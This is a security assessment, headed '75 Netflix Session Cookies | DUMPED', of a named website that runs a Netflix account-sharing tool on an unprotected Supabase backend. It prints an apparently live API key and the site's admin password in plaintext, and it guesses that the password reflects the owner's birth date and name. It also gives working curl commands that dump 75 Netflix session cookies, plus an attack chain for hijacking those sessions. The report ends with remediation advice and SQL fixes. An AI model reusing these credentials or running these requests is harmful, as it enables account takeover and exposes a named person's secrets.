
75 Netflix Session Cookies | DUMPED


Security Assessment: hindisijared.dev

Target Overview

  • URL: https://hindisijared.dev
  • Platform: Static portfolio site on Cloudflare Pages hosting a Netflix account sharing tool ("Stream Manager") at /unli-stream
  • Tech Stack: Vanilla HTML/CSS/JS, Supabase (BaaS), SweetAlert2, Cloudflare CDN with SPA fallback routing
  • Assessment Date: February 28, 2026

Executive Summary

hindisijared.dev hosts a Netflix session-sharing platform ("Stream Manager") at /unli-stream with a completely unprotected Supabase backend. The Supabase anon key, exposed in a 106KB obfuscated app.js, grants unauthenticated read access to the entire accounts table (75 Netflix accounts with full session cookies) and the admin_config table (including the admin password in plaintext). This represents a total backend compromise achievable by anyone with a web browser.


Critical Findings

1. Supabase Row Level Security (RLS) Bypass — Full Database Read Access

Severity: CRITICAL
CVSS: 9.8

The Supabase backend has no RLS policies on the accounts and admin_config tables. The anon API key (exposed in client-side JavaScript) allows unauthenticated REST API access to read all data.

Extracted Credentials:

  • Supabase URL: https://rixbfnwxrirmobhrponz.supabase.co
  • Supabase Anon Key: sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC

Proof of Concept:

# Read all Netflix accounts with full session cookies
curl -s \
  -H "apikey: sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC" \
  -H "Authorization: Bearer sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC" \
  "https://rixbfnwxrirmobhrponz.supabase.co/rest/v1/accounts?select=*"

Response: Returns all 75 accounts (confirmed via Content-Range: 0-74/75) with the following fields per row:

Field          | Description                                | Sensitivity
---------------|--------------------------------------------|------------
id             | Auto-increment ID                          | Low
account_email  | Account label (e.g., "account 4")          | Medium
cookie_data    | Full Netflix session cookies as JSON array | CRITICAL
account_status | "valid" / etc.                             | Low
platform       | "netflix"                                  | Low
last_used_at   | Timestamp of last access                   | Medium
created_at     | Account creation timestamp                 | Low
usage_count    | Total access count                         | Low
usage_pc       | PC access count                            | Low
usage_mobile   | Mobile access count                        | Low

Exposed Netflix Cookies Include:

  • NetflixId — Primary session token (full auth cookie with encrypted payload)
  • SecureNetflixId — Secondary secure session token
  • nfvdid — Netflix device/visitor ID
  • profilesNewSession — Session management cookie
  • OptanonConsent — Consent/geolocation data (reveals user's country: GB;ENG, etc.)

Impact: Any attacker can extract all 75 Netflix session cookies and use them to hijack active Netflix sessions — gaining full access to premium Netflix accounts without credentials.


2. Admin Password Exposed in Plaintext

Severity: CRITICAL
CVSS: 9.1

The admin_config table is fully readable with the anon key and contains the admin password stored in plaintext.

Proof of Concept:

curl -s \
  -H "apikey: sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC" \
  -H "Authorization: Bearer sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC" \
  "https://rixbfnwxrirmobhrponz.supabase.co/rest/v1/admin_config?select=key,value"

Full admin_config dump (8 entries):

Key                | Value
-------------------|------------------------------------------------------------
admin_password     | 012629Jared
broadcast_active   | false
broadcast_msg      | Bading si denver
system_broadcast   | {"active": false, "message": "MAINTENANCE KINDLY WAIT "}
broadcast_message  | MAINTENANCE PLEASE WAIT 30MINS TO 1 HOUR, THANK YOU
show_ad_banner     | true
maintenance_active | false

Impact:

  • Admin password 012629Jared can be used to access admin functionality in the Stream Manager app
  • Password follows pattern 012629 + Jared (likely birth date + name) — high probability of credential reuse across other services
  • Plaintext password storage violates basic security practices

3. Exposed RPC Function Signatures (Information Disclosure)

Severity: MEDIUM
CVSS: 5.3

PostgREST error messages leak the full parameter signatures of server-side RPC functions:

Function              | Parameters                                        | Purpose
----------------------|---------------------------------------------------|------------------------------------------------
verify_license_v2     | (p_hwid, p_license_key)                           | License key validation with hardware ID binding
claim_license         | (p_hardware_id, p_include_account, p_license_key) | License claiming with account bundling
admin_import_accounts | Unknown (exists but params not discoverable)      | Bulk account import (admin function)
searchAccounts        | Referenced in JS but not found via REST           | Account search functionality

Impact: Attackers can understand the licensing system's internal logic and craft targeted attacks against the license verification mechanism. The p_hwid/p_hardware_id parameters suggest hardware-based DRM that could be spoofed.


4. Hardcoded Supabase Credentials in Obfuscated Client-Side JavaScript

Severity: HIGH
CVSS: 7.5

The 106KB app.js at the site root uses basic JavaScript obfuscation (string array + base64 decoder rotation) that is trivially reversible. The CONFIG object contains hardcoded Supabase credentials:

CONFIG = {
    supabaseUrl: _0x294aab(0x34a),  // "https://rixbfnwxrirmobhrponz.supabase.co"
    supabaseKey: _0x294aab(0x35b)   // "sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC"
}

Deobfuscation Method:

  1. Extract _0x234a string array function (26KB of base64-encoded strings)
  2. Extract _0x294aab decoder function with _0x1d9a base64 helper
  3. Run through Node.js vm module — all ~500 strings decoded in seconds

Impact: The obfuscation provides zero actual security. Any attacker can extract the Supabase credentials and directly query the backend API.


High Findings

5. Missing Security Headers

Severity: MEDIUM
CVSS: 4.3

Present Headers:

  • x-content-type-options: nosniff
  • referrer-policy: strict-origin-when-cross-origin

Missing Headers:

Header                    | Risk
--------------------------|----------------------------------------------------------------------------
Content-Security-Policy   | No CSP — allows XSS, inline script execution, unrestricted resource loading
X-Frame-Options           | No clickjacking protection — site can be embedded in iframes
Strict-Transport-Security | No HSTS on the main domain (present on Supabase)
Permissions-Policy        | No feature restrictions

6. Overly Permissive CORS

Severity: MEDIUM
CVSS: 4.3

Access-Control-Allow-Origin: *

The wildcard CORS header allows any origin to make authenticated requests to the site, enabling cross-origin data exfiltration.

7. Client-Side Anti-DevTools Bypass

Severity: LOW (Security Theater)
CVSS: 2.0

The inline script disables F12, right-click, Ctrl+U, and Ctrl+Shift+I/C/J. This is trivially bypassed by:

  • Opening DevTools before loading the page
  • Using browser extensions
  • Using curl / Postman directly
  • Disabling JavaScript temporarily

Database Architecture Summary

Supabase Project: rixbfnwxrirmobhrponz
├── Tables (public schema)
│   ├── accounts        [NO RLS - FULLY READABLE] — 75 rows
│   │   ├── id, account_email, cookie_data (Netflix cookies)
│   │   ├── account_status, platform, usage_count
│   │   └── usage_pc, usage_mobile, last_used_at, created_at
│   ├── admin_config    [NO RLS - FULLY READABLE] — 8 rows
│   │   └── key, value (includes admin_password in plaintext)
│   ├── licenses        [RLS ENABLED - Permission Denied]
│   └── cookie_data     [Does not exist as separate table]
├── RPC Functions
│   ├── verify_license_v2(p_hwid, p_license_key)
│   ├── claim_license(p_hardware_id, p_include_account, p_license_key)
│   └── admin_import_accounts(unknown params)
├── Storage Buckets     [Empty - No buckets found]
└── Realtime
    ├── postgres_changes (accounts, admin_config)
    └── broadcast_active

Access Control Summary:

Resource      | READ             | WRITE (INSERT/UPDATE/DELETE)
--------------|------------------|-----------------------------
accounts      | ✅ OPEN          | ❌ Blocked
admin_config  | ✅ OPEN          | Not tested destructively
licenses      | ❌ Blocked (RLS) | ❌ Blocked
RPC functions | ✅ Callable      | N/A

Attack Chain

1. Visit https://hindisijared.dev/app.js
2. Deobfuscate JS (trivial — base64 string array)
3. Extract Supabase URL + anon key
4. Query /rest/v1/accounts?select=* → Get all 75 Netflix session cookies
5. Query /rest/v1/admin_config → Get admin password "012629Jared"
6. Import any NetflixId cookie into browser → Full Netflix account access
7. Use admin password to access admin panel functions

Total time from discovery to full exploitation: ~10 minutes


Recommendations

  1. IMMEDIATE: Enable RLS on ALL tables — Add ALTER TABLE accounts ENABLE ROW LEVEL SECURITY; and ALTER TABLE admin_config ENABLE ROW LEVEL SECURITY; with appropriate policies
  2. IMMEDIATE: Rotate all Netflix session cookies — All 75 accounts are compromised and should be considered breached
  3. IMMEDIATE: Change admin password and remove it from the database — use Supabase Auth or a proper hashed credential store
  4. IMMEDIATE: Rotate the Supabase anon key — The current key is publicly known
  5. HIGH: Implement proper authentication — Use Supabase Auth with JWT-based RLS policies; never expose raw table access to anon users
  6. HIGH: Add Content-Security-Policy header — Restrict script sources, disable inline scripts
  7. HIGH: Remove CORS wildcard — Restrict to specific trusted origins
  8. MEDIUM: Move sensitive operations server-side — Use Supabase Edge Functions or a proper API layer instead of direct client-to-database access
  9. LOW: Remove anti-devtools script — It provides no security benefit and wastes bandwidth
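As an added illustration of how recommendations 1, 3 and 5 could be applied in Supabase/Postgres SQL (editor-added example, not the site's code or a remediation the report itself supplies): the table and column names come from the report, while the owner_id column, the policy name and the use of Supabase Auth's auth.uid() are assumptions.

```sql
-- Added example: lock down the two tables the report found readable by the anon key.
-- Assumes a Supabase project with the standard anon / authenticated / service_role roles.

-- 1. Enable RLS. With RLS on and no policy, anon and authenticated get zero rows;
--    only service_role (server-side) bypasses RLS.
ALTER TABLE public.accounts     ENABLE ROW LEVEL SECURITY;
ALTER TABLE public.admin_config ENABLE ROW LEVEL SECURITY;
ALTER TABLE public.accounts     FORCE  ROW LEVEL SECURITY;
ALTER TABLE public.admin_config FORCE  ROW LEVEL SECURITY;

-- 2. Belt and braces: remove the table-level grants PostgREST roles had.
--    Policies only filter rows; without a grant the request is rejected outright.
REVOKE ALL ON public.admin_config FROM anon, authenticated;
REVOKE ALL ON public.accounts     FROM anon;

-- 3. Recommendation 3: the admin password does not belong in a client-readable
--    table at all. Delete the row; move admin login to Supabase Auth.
DELETE FROM public.admin_config WHERE key = 'admin_password';

-- 4. Recommendation 5: tie each account row to a signed-in user (assumed column)
--    so a JWT-based policy can scope reads to the row owner.
ALTER TABLE public.accounts
  ADD COLUMN IF NOT EXISTS owner_id uuid REFERENCES auth.users(id);

-- Authenticated users see only their own rows; anon has no policy and no grant.
CREATE POLICY accounts_owner_select ON public.accounts
  FOR SELECT TO authenticated
  USING (owner_id = auth.uid());

-- 5. Verify from the anon role: the read that the report's curl PoC performed
--    must now fail with "permission denied for table accounts".
SET ROLE anon;
SELECT count(*) FROM public.accounts;
RESET ROLE;
```

Run the verification step again after deploying the rotated anon key (recommendation 4); a successful SELECT under SET ROLE anon means a grant or a permissive policy is still in place.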